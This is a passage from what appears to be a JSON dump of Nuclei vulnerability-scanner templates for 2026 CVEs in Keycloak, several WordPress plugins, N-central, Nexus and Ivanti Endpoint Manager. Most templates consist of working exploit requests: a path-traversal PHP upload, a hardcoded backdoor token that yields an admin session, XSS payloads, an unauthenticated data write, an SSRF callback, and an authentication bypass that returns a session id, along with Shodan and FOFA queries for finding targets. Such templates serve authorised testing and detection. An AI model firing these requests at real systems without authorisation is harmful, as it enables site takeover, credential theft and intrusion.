application/x-www-form-urlencoded\n\n        tryAnotherWay=on\n\n    redirects: true\n    max-redirects: 3\n\n    extractors:\n      - type: regex\n        name: selector_form_action\n        internal: true\n        part: body\n        group: 1\n        regex:\n          - 'id=\"kc-select-credential-form\"[^>]*action=\"(?:https?://[^/]+)?(/[^\"]*)\"'\n\n    matchers:\n      - type: status\n        status:\n          - 200\n        internal: true\n\n  - id: step-4\n    raw:\n      - |\n        POST {{replace(selector_form_action,\"&amp;\",\"&\")}} HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        username={{username}}\n\n    redirects: true\n    max-redirects: 3\n\n    extractors:\n      - type: regex\n        name: restart_path\n        internal: true\n        part: body\n        group: 1\n        regex:\n          - '(/realms/[^\\s\"''<]+/login-actions/restart[^\\s\"''<]*skip_logout=true[^\\s\"''<]*)'\n\n    matchers:\n      - type: status\n        status:\n          - 200\n          - 302\n        internal: true\n\n  - id: step-5\n    raw:\n      - |\n        GET {{restart_path}} HTTP/1.1\n        Host: {{Hostname}}\n\n    redirects: true\n    max-redirects: 3\n\n    matchers:\n      - type: status\n        status:\n          - 200\n          - 302\n        internal: true\n\n  - id: step-6\n    raw:\n      - |\n        GET {{replace(forgot_path,\"&amp;\",\"&\")}} HTTP/1.1\n        Host: {{Hostname}}\n\n    redirects: true\n    max-redirects: 3\n\n    extractors:\n      - type: regex\n        name: stale_selector_action\n        internal: true\n        part: body\n        group: 1\n        regex:\n          - 'id=\"kc-select-credential-form\"[^>]*action=\"(?:https?://[^/]+)?(/[^\"]*)\"'\n\n    matchers:\n      - type: word\n        words:\n          - \"kc-select-credential-form\"\n        part: body\n        internal: true\n\n  - id: step-7\n    raw:\n      - |\n        POST {{replace(stale_selector_action,\"&amp;\",\"&\")}} HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        username={{username}}\n\n    redirects: true\n    max-redirects: 3\n\n    matchers:\n      - type: word\n        words:\n          - \"kc-passwd-update-form\"\n        part: body\n\n    extractors:\n      - type: dsl\n        dsl:\n          - '\"username=\" + username + \" | realm=\" + realm'\n# digest: 4a0a00473045022100a0f7c9802fac583e375ed2ef8c92587ffd12d27fd1bf4e3e31b30609c97d49ac022043ff3c98111f7a674f4825ce7b83e3eff004c6d92f50a24d868afff9dc185f87:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-18963.yaml","vuln_id":"cve-2026-18963"},{"raw":"id: CVE-2026-1890\n\ninfo:\n  name: LeadConnector < 3.0.22 - Unauthenticated Arbitrary Data Write\n  author: 0x_Akoko\n  severity: medium\n  description: |\n   LeadConnector WordPress plugin < 3.0.22 contains a broken access control caused by missing authorization in a REST route, letting unauthenticated attackers overwrite existing data remotely, exploit requires no authentication.\n  impact: |\n   Unauthenticated attackers can overwrite existing data, potentially leading to data tampering and loss of integrity.\n  remediation: |\n   Update to version 3.0.22 or later.\n  reference:\n    - https://wpscan.com/vulnerability/9b88be70-b5cc-4a3f-a871-64d61cb02076/\n    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1890\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2026-1890\n    epss-score: 0.00682\n    epss-percentile: 0.51051\n    cwe-id: CWE-862\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: leadconnector\n    product: leadconnector\n    fofa-query: body=\"/wp-content/plugins/leadconnector/\"\n    shodan-query: http.html:\"leadconnector\"\n    tags: cve,cve2026,wordpress,wp-plugin,leadconnector,unauth,rest-api,intrusive,vkev\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /wp-content/plugins/leadconnector/README.txt HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"LeadConnector\")'\n          - 'compare_versions(lsversion, \">=1.0.0\", \"<=3.0.21\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: lsversion\n        internal: true\n        regex:\n          - 'Stable tag: ([\\d.]+)'\n        group: 1\n\n  - raw:\n      - |\n        POST /wp-json/lc_internal_api/v1/save_custom_values HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"custom_values\":[{\"fieldKey\":\"{{randstr}}\",\"id\":\"1\"}]}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"application/json\")'\n          - 'contains_all(body, \"status\", \"success\")'\n        condition: and\n# digest: 490a00463044022026e04e61e2920f2461c70bf7d5a34d9a6a2b1b0f72ca2324cb4e0e25fd2ec06b02201b592b594b252f67c638a943439d051e12472b43740a9dec913aafa06a7fe1e8:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-1890.yaml","vuln_id":"cve-2026-1890"},{"raw":"id: CVE-2026-18577\n\ninfo:\n  name: N-able N-central < 2026.3.1.10 - Authentication Bypass\n  author: patrick-threatmate\n  severity: critical\n  description: |\n    N-able N-central versions through 2026.3.1 contain an authentication bypass that lets a remote unauthenticated attacker take over an administrator account and gain full control of the N-central server. CVE-2026-18577 is a bypass of the incomplete fix for CVE-2026-18556, so the 2026.3.1 Hotfix 1 build (2026.3.1.7) does not fully remediate it. Hotfix 2 (2026.3.1.10) supersedes Hotfix 1 and is the first fully fixed 2026.3 build.\n  impact: |\n    Unauthenticated attackers gain administrative access to the RMM console and can reach every managed endpoint through Take Control. Exploited in the wild and added to the CISA Known\n  remediation: |\n    Upgrade on-premises N-central to 2026.3.1.10 (2026.3 Hotfix 2) or to a later release line (2026.4 or newer). Applying Hotfix 1 (2026.3.1.7) alone is not sufficient. N-able hosted environments were mitigated by the vendor and need no customer action.\n  reference:\n    - https://www.n-able.com/blog/n-central-security-update-august-6-2026\n    - https://status.n-able.com/2026/08/06/n-central-2026-3-hotfix-2-additional-mitigation-for-cve-2026-18577/\n    - https://www.rapid7.com/blog/post/etr-cve-2026-18577-n-able-n-central-authentication-bypass-exploited-in-the-wild/\n    - https://www.huntress.com/blog/n-able-vulnerability-exploitation\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-18577\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-18556\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 8.1\n    cve-id: CVE-2026-18577\n    epss-score: 0.54068\n    epss-percentile: 0.98957\n    cwe-id: CWE-288\n    cpe: cpe:2.3:a:n-able:n-central:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: n-able\n    product: n-central\n    shodan-query: http.title:\"N-central Login\"\n    fofa-query: title=\"N-central Login\"\n  tags: cve,cve2026,n-able,ncentral,auth-bypass,kev,passive,vkev\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/login\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        condition: or\n        words:\n          - 'class=\"ncentral\"'\n          - 'ncentralVersion'\n\n      - type: dsl\n        dsl:\n          - compare_versions(version, '< 2026.3.1.10')\n\n    extractors:\n      - type: regex\n        name: version\n        internal: true\n        group: 1\n        regex:\n          - 'ncentralVersion:\\s*\"(202\\d+\\.\\d+\\.\\d+\\.\\d+)\"'\n\n      - type: regex\n        name: ncentral_version\n        group: 1\n        regex:\n          - 'ncentralVersion:\\s*\"(202\\d+\\.\\d+\\.\\d+\\.\\d+)\"'\n# digest: 4b0a00483046022100d67cca4b1ee39d2afa35f484b4204b3f2d9c0cb669ca9a25f664ac703272cb830221009944e5d91b0ac419d4482c3da0a257d992a3b64c428715d4ddc8c043bc04b597:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-18577.yaml","vuln_id":"cve-2026-18577"},{"raw":"id: CVE-2026-1830\n\ninfo:\n  name: Quick Playground <= 1.3.1 - Missing Authorization to Unauthenticated Arbitrary File Upload\n  author: iamatownboy\n  severity: critical\n  description: |\n    The Quick Playground plugin for WordPress is vulnerable to remote code execution in all versions up to, and including, 1.3.1.\n    The plugin exposes a blueprint REST API endpoint (permission_callback: __return_true) that leaks the sync code, and an upload_image endpoint that accepts file uploads with path traversal in the filename parameter without sufficient authorization checks, which can be chained into arbitrary PHP file upload and RCE.\n  impact: |\n    Unauthenticated attackers can retrieve the sync code via the blueprint endpoint, upload arbitrary PHP files via path traversal in the upload_image endpoint, and achieve remote code execution on the server.\n  remediation: |\n    Update Quick Playground to version 1.3.2 or later.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-1830\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/308cd28a-a477-4bc6-a392-ad5a9eca1cb5?source=cve\n    - https://plugins.trac.wordpress.org/browser/quick-playground/trunk/api.php#L39\n    - https://plugins.trac.wordpress.org/browser/quick-playground/trunk/expro-api.php#L419\n    - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3500839%40quick-playground&new=3500839%40quick-playground&sfp_email=&sfph_mail=\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-1830\n    epss-score: 0.08095\n    epss-percentile: 0.9456\n    cwe-id: CWE-862\n  metadata:\n    verified: true\n    max-request: 4\n    vendor: davidfcarr\n    product: quick-playground\n    framework: wordpress\n    publicwww-query: \"/plugins/quick-playground/\"\n  tags: cve,cve2026,wordpress,wp,wp-plugin,quick-playground,unauth,rce,file-upload,intrusive\n\nvariables:\n  filename: \"{{rand_text_alpha(8)}}.php\"\n\nflow: http(1) && http(2) && http(3) && http(4)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-content/plugins/quick-playground/readme.txt\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - contains(body, \"Quick Playground\")\n          - compare_versions(version, \"<= 1.3.1\")\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: version\n        part: body\n        group: 1\n        regex:\n          - '(?i)Stable tag:\\s*([0-9.]+)'\n        internal: true\n\n  - raw:\n      - |\n        GET /wp-json/quickplayground/v1/blueprint/default HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - '\"qckply_sync_code\"\\s*:\\s*\"[a-zA-Z0-9]+\"'\n        internal: true\n\n    extractors:\n      - type: regex\n        name: sync_code\n        part: body\n        group: 1\n        regex:\n          - '\"qckply_sync_code\"\\s*:\\s*\"([a-zA-Z0-9]+)\"'\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-json/quickplayground/v1/upload_image/default HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"sync_code\":\"{{sync_code}}\",\"base64\":\"PD9waHAgZWNobyAiQ1ZFLTIwMjYtMTgzMCI7ID8+\",\"filename\":\"../../{{filename}}\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 200\n          - contains(body, \"saving to\")\n        condition: and\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-content/{{filename}}\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 200\n          - contains(body, \"CVE-2026-1830\")\n        condition: and\n# digest: 4a0a00473045022011dfd27ea296b897e1f8447d65ab6763c24d015e3c90c3f0e5b2543f8f1b9f26022100fe9befede815e14eb63f76f735b4e63961743fdd8f788db11853043183a95b63:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-1830.yaml","vuln_id":"cve-2026-1830"},{"raw":"id: CVE-2026-18072\n\ninfo:\n  name: Advanced Responsive Video Embedder 10.8.7/10.8.8 - Hardcoded Backdoor Authentication Bypass\n  author: str4k3r\n  severity: critical\n  description: |\n    The compromised Advanced Responsive Video Embedder WordPress plugin releases 10.8.7 and 10.8.8 accept a hardcoded token through the `_wplogin` parameter and establish an authenticated administrator session before normal authentication. A single unauthenticated GET request triggers the backdoor. This template only inspects the redirect and session-cookie response and does not perform any administrative action.\n  impact: |\n    An unauthenticated attacker gains a full administrator session on the WordPress site, allowing complete takeover including plugin/theme editing, arbitrary PHP execution, and data theft.\n  remediation: |\n    Immediately remove the Advanced Responsive Video Embedder plugin versions 10.8.7 and 10.8.8, reinstall a known-clean release, rotate all secrets and passwords, and audit for rogue administrator accounts and web shells created after the backdoor was published.\n  reference:\n    - https://www.wordfence.com/blog/2026/07/wordfence-prism-detected-backdoored-wordpress-plugin-within-two-hours-of-it-being-introduced/\n    - https://plugins.trac.wordpress.org/browser/advanced-responsive-video-embedder/tags/10.8.7/php/fn-update-check.php\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-18072\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-18072\n    epss-score: 0.03231\n    epss-percentile: 0.87703\n    cwe-id: CWE-798\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: advanced-responsive-video-embedder\n    product: advanced-responsive-video-embedder\n    framework: wordpress\n    shodan-query: http.html:\"advanced-responsive-video-embedder\"\n    fofa-query: body=\"advanced-responsive-video-embedder\"\n  tags: cve,cve2026,wordpress,wp-plugin,wp,backdoor,authbypass,unauth,arve\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/?_wplogin=35fe7057ffed92ff7bc5a0b90f302a77fb5843ad6c972294d68da0b0553b3900\"\n\n    redirects: false\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: header\n        words:\n          - \"/wp-admin/\"\n\n      - type: regex\n        part: header\n        regex:\n          - \"(?i)set-cookie:\\\\s*wordpress_logged_in_[a-f0-9]{32}=\"\n\n      - type: status\n        status:\n          - 302\n\n    extractors:\n      - type: regex\n        part: header\n        group: 1\n        regex:\n          - \"(?i)wordpress_logged_in_[a-f0-9]{32}=([^;]+)\"\n# digest: 4a0a0047304502204c83441e6a32262fba4167612711a0471ec59551fe8ae607a95d41ec2753a107022100d72fca07db8706b2c4b3d9c1703e565d0412b40f820c820c82c6c02aba705b9d:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-18072.yaml","vuln_id":"cve-2026-18072"},{"raw":"id: CVE-2026-17594\n\ninfo:\n  name: Sonatype Nexus Repository < 3.95.0 - Privilege Escalation via Repository Format Mismatch\n  author: 1dayexploit\n  severity: high\n  description: |\n    Nexus Repository 3 CE/Pro 3.0.0 through 3.94.x contains an incorrect authorization vulnerability caused by inconsistent authorization checks in the repository-creation UI, letting delegated repository-admin users create unauthorized repository formats, exploit requires delegated repository-admin privilege.\n  impact: |\n    Delegated repository-admin users can create unauthorized repository formats, potentially leading to privilege abuse or unauthorized repository creation.\n  remediation: |\n    Upgrade to version 3.95.0 or later.\n  reference:\n    - https://github.com/sonatype/nexus-public\n    - https://help.sonatype.com/en/sonatype-nexus-repository-3-95-0-release-notes.html\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-17594\n  classification:\n    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N\n    cvss-score: 8.2\n    cve-id: CVE-2026-17594\n    cwe-id: CWE-863\n    epss-score: 0.00716\n    epss-percentile: 0.52309\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: sonatype\n    product: nexus_repository\n    shodan-query: http.title:\"Sonatype Nexus Repository\"\n    fofa-query: title=\"Sonatype Nexus Repository\"\n  tags: cve,cve2026,nexus,sonatype,pri-esc,authenticated,intrusive\n\nvariables:\n  repo_name: \"{{rand_text_alpha(8)}}\"\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        POST /service/extdirect HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Basic {{base64(username + ':' + password)}}\n        Content-Type: application/json\n\n        {\"action\":\"coreui_Repository\",\"method\":\"create\",\"type\":\"rpc\",\"tid\":1,\"data\":[{\"name\":\"{{repo_name}}-ctl\",\"format\":\"raw\",\"recipe\":\"raw-hosted\",\"online\":true,\"routingRuleId\":\"\",\"attributes\":{\"storage\":{\"blobStoreName\":\"default\",\"strictContentTypeValidation\":true,\"writePolicy\":\"ALLOW\"},\"cleanup\":{\"policyName\":[]},\"component\":{\"proprietaryComponents\":false},\"raw\":{\"contentDisposition\":\"ATTACHMENT\"}}}]}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"\\\"success\\\":false\"\n          - \"does not have permission\"\n        condition: and\n        internal: true\n\n      - type: status\n        status:\n          - 200\n        internal: true\n\n  - raw:\n      - |\n        POST /service/extdirect HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Basic {{base64(username + ':' + password)}}\n        Content-Type: application/json\n\n        {\"action\":\"coreui_Repository\",\"method\":\"create\",\"type\":\"rpc\",\"tid\":2,\"data\":[{\"name\":\"{{repo_name}}\",\"format\":\"maven2\",\"recipe\":\"raw-hosted\",\"online\":true,\"routingRuleId\":\"\",\"attributes\":{\"storage\":{\"blobStoreName\":\"default\",\"strictContentTypeValidation\":true,\"writePolicy\":\"ALLOW\"},\"cleanup\":{\"policyName\":[]},\"component\":{\"proprietaryComponents\":false},\"raw\":{\"contentDisposition\":\"ATTACHMENT\"}}}]}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"\\\"success\\\":true\"\n          - \"\\\"format\\\":\\\"raw\\\"\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 490a0046304402202059daae46a9090922ea3d215c207637640efcc79cface921b220075bdb3898202200e2c028de62770c690f6974b7ac7a2ef90ff9f4fbe98f12caf8ccc92c2b66ade:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-17594.yaml","vuln_id":"cve-2026-17594"},{"raw":"id: CVE-2026-17532\n\ninfo:\n  name: Seraphinite Accelerator <= 2.29.18 - Cross-Site Scripting\n  author: 0x_Akoko\n  severity: medium\n  description: |\n    The Seraphinite Accelerator plugin for WordPress up to and including 2.29.18 was vulnerable to reflected cross-site scripting through the seraph_accel_prep parameter. CacheExtractPreparePageParams() compared the expected HMAC against the JSON-decoded nonce with PHP's loose != operator, so a JSON boolean true satisfied the comparison and bypassed the signature check, and _CbContentFinishSkip() then concatenated the attacker-controlled selfTest field straight into the response body, letting unauthenticated attackers inject arbitrary scripts.\n  impact: |\n    An unauthenticated attacker could run arbitrary JavaScript in a victim's browser by luring them to a crafted link, leading to session theft or actions performed as the victim.\n  remediation: |\n    Update Seraphinite Accelerator to version 2.29.19 or later.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/seraphinite-accelerator/seraphinite-accelerator-22918-reflected-cross-site-scripting\n    - https://plugins.trac.wordpress.org/browser/seraphinite-accelerator/trunk/common.php\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-17532\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n    cvss-score: 6.1\n    cve-id: CVE-2026-17532\n    epss-score: 0.00817\n    epss-percentile: 0.55607\n    cwe-id: CWE-79\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: seraphinite\n    product: seraphinite-accelerator\n    framework: wordpress\n    fofa-query: body=\"seraphinite-accelerator\"\n  tags: cve,cve2026,wordpress,wp,wp-plugin,seraphinite,xss\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    host-redirects: true\n    max-redirects: 3\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"seraphinite-accelerator\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /?seraph_accel_prep=eyJub25jZSI6dHJ1ZSwic2VsZlRlc3QiOiI8aW1nIHNyYz14IG9uZXJyb3I9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT4ifQ%3D%3D HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"selfTest-<img src=x onerror=alert(document.domain)>\"\n\n      - type: word\n        part: content_type\n        words:\n          - \"text/html\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100cd009ea9790f8d658df3a3880532aae067c9b55d38760b6766da2a07281cbd0a022100e263b8da4dfe3b10cf439bbe3787cfb23f46834954771affb132244e37e2205e:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-17532.yaml","vuln_id":"cve-2026-17532"},{"raw":"id: CVE-2026-17505\n\ninfo:\n  name: WordPress TranslatePress < 3.2.6 - Cross-Site Scripting\n  author: 0x_Akoko\n  severity: medium\n  description: |\n    TranslatePress plugin < 3.2.6 for WordPress contains a reflected cross-site scripting vulnerability in the translation marker processing feature, letting attackers inject and execute arbitrary JavaScript code, exploit requires no authentication or privileges.\n  impact: |\n    Attackers can execute arbitrary JavaScript in victim browsers, leading to session hijacking and account takeover.\n  remediation: |\n    Update to version 3.2.6 or later of TranslatePress plugin.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-17505\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n    cvss-score: 6.1\n    cve-id: CVE-2026-17505\n    epss-score: 0.00804\n    epss-percentile: 0.55207\n    cwe-id: CWE-79\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: cozmoslabs\n    product: translatepress-multilingual\n    framework: wordpress\n    shodan-query: http.html:\"translatepress\"\n    fofa-query: body=\"translatepress\"\n  tags: cve,cve2026,wordpress,wp-plugin,wp,translatepress,xss\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    host-redirects: true\n    max-redirects: 3\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"translatepress\") || contains(body, \"trp-language-switcher\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: lang\n        part: body\n        group: 1\n        internal: true\n        regex:\n          - 'rel=\"alternate\"\\s+hreflang=\"[a-zA-Z-]+\"\\s+href=\"https?://[^/\"]+/([a-z]{2,3})/\"'\n\n  - raw:\n      - |\n        GET /{{lang}}/?s=%23!trpst%23img%20src=x%20onerror=alert(document.domain)%23!trpen%23 HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '<img src=\"x\" onerror=\"alert(document.domain)\">'\n          - 'search'\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a0047304502200a7895d2980a29461013f155256588f41662d78e48ffb6e4bb2e97ce2ad7f9ce022100d1bc260e236d7f46aa87ce7206250f7208e0f3c3e597e5884fa363eb5117ad77:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-17505.yaml","vuln_id":"cve-2026-17505"},{"raw":"id: CVE-2026-16268\n\ninfo:\n  name: Newsletters < 4.16 - Unauthenticated SSRF via SNS Bounce Handler\n  author: str4k3r\n  severity: medium\n  description: |\n    Newsletters WordPress plugin < 4.16 contains a server-side request forgery caused by lack of authentication and validation in bounce-processing requests, letting unauthenticated attackers make arbitrary requests to internal or external hosts.\n  impact: |\n    Unauthenticated attackers can make the server send requests to arbitrary hosts, potentially leading to internal network scanning or interaction with unintended services.\n  remediation: |\n    Update to version 4.16 or later.\n  reference:\n    - https://wpscan.com/vulnerability/65612dd4-83d8-40c5-8e12-862e9b5f940b/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-16268\n  classification:\n    cve-id: CVE-2026-16268\n    epss-score: 0.00437\n    epss-percentile: 0.37496\n    cwe-id: CWE-918\n    cvss-score: 5.3\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: newsletters-lite\n    product: newsletters-lite\n    framework: wordpress\n    fofa-query: body=\"/wp-content/plugins/newsletters-lite/\"\n    shodan-query: http.html:\"/wp-content/plugins/newsletters-lite/\"\n  tags: cve,cve2026,wordpress,wp-plugin,newsletters-lite,ssrf,unauth,oast\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /wp-content/plugins/newsletters-lite/readme.txt HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(body, \"Newsletters\", \"newsletters\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /?wpmlmethod=bounce&type=sns HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"Type\":\"SubscriptionConfirmation\",\"SubscribeURL\":\"http://{{interactsh-url}}/nuclei-ssrf-probe\",\"Message\":\"{}\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(interactsh_protocol, \"http\")'\n        condition: and\n# digest: 4a0a00473045022100c6ba87f1d8acd0618a61aaa67b98a8fbf5957cc772343e8064459117830ab29a022034bb376de902c16612d2b9a672e92e10b63597e6d9b890aa6cc9fa081bb5123e:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-16268.yaml","vuln_id":"cve-2026-16268"},{"raw":"id: CVE-2026-1603\n\ninfo:\n  name: Ivanti Endpoint Manager - Authentication Bypass\n  author: DhiyaneshDk,watchtowrlabs\n  severity: high\n  description: |\n    Ivanti Endpoint Manager < 2024 SU5 contains an authentication bypass caused by improper access control, letting remote unauthenticated attackers leak stored credential data, exploit requires no special privileges.\n  impact: |\n    Remote attackers can leak stored credential data, potentially compromising sensitive information.\n  remediation: |\n    Update to version 2024 SU5 or later.\n  reference:\n    - https://x.com/watchtowrcyber/status/2022305033086235108/photo/1\n    - https://hub.ivanti.com/s/article/Security-Advisory-EPM-February-2026-for-EPM-2024\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-1603\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\n    cvss-score: 8.6\n    cve-id: CVE-2026-1603\n    cwe-id: CWE-288\n    epss-score: 0.8056\n    epss-percentile: 0.99605\n    cpe: cpe:2.3:a:ivanti:endpoint_manager:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: ivanti\n    product: endpoint_manager\n  tags: cve,cve2026,api,auth,ivanti,epmm,authbypass,vkev,kev\n\nhttp:\n  - raw:\n      - |\n        POST /RemoteControlAuth/api/Auth HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\n            \"logintype\":\"64\",\n            \"username\":\"administrator\"\n        }\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"sessionid\":'\n\n      - type: word\n        part: body\n        words:\n          - '\"sessionid\": null'\n        negative: true\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: json\n        part: body\n        name: sessionid\n        json:\n          - '.sessionid'\n# digest: 4a0a004730450221009b5aa7e92b56b4bfcdc1e5f05f454ece9b801e148af5f258ed68911a063ea07f0220370eb4d6e94a3aafb9d56947c4e467e089154b29abaa2e984d3f3ab9ff468529:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-1603.yaml","vuln_id":"cve-2026-1603"},{"raw":"id: CVE-2026-15826\n\ninfo:\n  name: User Profile Builder 3.16.4 - Unauthenticated Authentication Bypass\n  author: theamanrawat\n  severity: critical\n  description: |\n    The User Profile Builder plugin for WordPress version 3.16.4 is vulnerable to an authentication bypass via type confusion. Profile Builder's automatic-login-after-registration handler passes the return value of wp_insert_user() through absint() before testing it with is_wp_error(), so the error check runs against the already-coerced integer. A registration submitted with a 61-70 character username passes the plugin's own validation but is rejected by WordPress core, because the user_login column is VARCHAR(60), and wp_insert_user() returns a WP_Error object. absint() coerces that object to the integer 1, is_wp_error(1) is false, and the plugin binds a transient-backed autologin nonce to user ID 1. Consuming that nonce calls wp_set_auth_cookie(1) and logs the unauthenticated attacker in as the site's Administrator.\n  impact: |\n    Unauthenticated attackers can log in as the site Administrator (user ID 1), gaining full administrative control including plugin and theme installation, PHP code execution, and complete site compromise.\n  remediation: |\n    Update User Profile Builder to 3.16.5 or later, which performs the is_wp_error() check before coercing the wp_insert_user() return value with absint() and additionally enforces the 60-character username limit server-side.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/9f606fba-f779-42ea-a160-6c3b20dc5e79\n    - https://plugins.trac.wordpress.org/browser/profile-builder/tags/3.16.4/front-end/class-formbuilder.php#L262\n    - https://plugins.trac.wordpress.org/browser/profile-builder/tags/3.16.4/features/functions.php#L1481\n    - https://plugins.trac.wordpress.org/changeset/3609855/profile-builder\n    - https://github.com/HORKimhab/CVE-2026-15826-CVE-2026-15748\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-15826\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-15826\n    epss-score: 0.03911\n    epss-percentile: 0.89832\n    cwe-id: CWE-704\n  metadata:\n    verified: true\n    max-request: 5\n    vendor: cozmoslabs\n    product: profile-builder\n    framework: wordpress\n    shodan-query: 